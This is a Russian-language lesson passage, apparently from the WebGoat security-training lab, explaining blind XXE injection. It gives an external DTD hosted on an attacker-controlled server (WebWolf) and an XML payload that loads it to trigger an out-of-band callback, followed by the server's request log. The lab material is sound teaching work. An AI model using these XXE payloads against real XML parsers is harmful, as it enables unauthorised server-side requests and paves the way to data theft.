== Слепой XXE

В некоторых случаях вы не увидите никаких выходных данных, потому что, хотя ваша атака могла сработать, поле не отражается в выходных данных страницы.
Или ресурс, который вы пытаетесь прочитать, содержит недопустимый символ XML, что приводит к сбою парсера.
Давайте начнем с примера, в этом случае мы ссылаемся на внешний DTD, который мы контролируем на нашем собственном сервере.

Как злоумышленник, вы имеете WebWolf под своим контролем (*это может быть любой сервер под вашим контролем.*), вы можете, например, использовать этот сервер, чтобы пинговать его с помощью `webWolfRootLink:landing[noLink]`

Как мы используем эту конечную точку, чтобы проверить, можем ли мы выполнить XXE?

Мы можем снова использовать WebWolf для размещения файла с именем `attack.dtd`, создать этот файл со следующим содержимым:

[source, subs="macros, specialcharacters"]
----
<?xml version="1.0" encoding="UTF-8"?>
<!ENTITY ping SYSTEM 'webWolfRootLink:landing[noLink, target=landing]'>
----

Теперь отправьте форму и измените XML, используя:

[source, subs="macros, specialcharacters"]
----
<?xml version="1.0"?>
<!DOCTYPE root [
<!ENTITY % remote SYSTEM "webWolfLink:[webWolfLink]">
%remote;
]>
<comment>
  <text>test&ping;</text>
</comment>
----

Теперь в WebWolf перейдите в раздел «Входящие запросы», и вы увидите:

[source]
----
{
  "method" : "GET",
  "path" : "/landing",
  "headers" : {
    "request" : {
      "user-agent" : "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0",
    },
  },
  "parameters" : {
    "test" : [ "HelloWorld" ],
  },
  "timeTaken" : "1"
}
----

Итак, с помощью XXE мы можем пинговать наш собственный сервер, что означает возможность внедрения XXE. Итак, с помощью внедрения XXE мы в принципе можем достичь того же эффекта, что и в начале с помощью команды curl.
